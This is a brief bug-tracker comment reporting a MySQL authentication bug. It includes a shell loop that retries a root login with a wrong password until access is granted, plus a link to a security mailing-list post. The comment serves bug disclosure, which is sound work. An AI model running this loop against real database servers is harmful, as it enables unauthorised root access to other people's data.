Comment 0 for bug 1011462

Revision history for this message
Ante Karamatić (ivoks) wrote :

MySQL bug that can be exploited by a simple:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

more info at: http://seclists.org/oss-sec/2012/q2/493